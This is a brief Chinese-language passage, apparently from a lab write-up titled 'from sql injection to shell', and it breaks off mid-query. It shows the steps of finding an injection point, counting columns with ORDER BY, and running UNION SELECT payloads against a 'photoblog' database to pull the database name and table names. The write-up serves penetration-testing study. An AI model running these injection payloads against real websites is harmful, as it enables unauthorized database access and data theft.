from sql injection to shell I

环境搭建好以后,找到一个注入点,发现加单引号报错,然后进行注入 oder by 4正常,order by 5报错,那么联合查询 发现第二个字段可以利用,然后开始注入,为了节省地盘,以下就打印输入和输出语句 ?id=1 union select 1,database(),3,4 >>>photoblog ?id=1 union select 1,group_concat(table_name),3,
相关文章
相关标签/搜索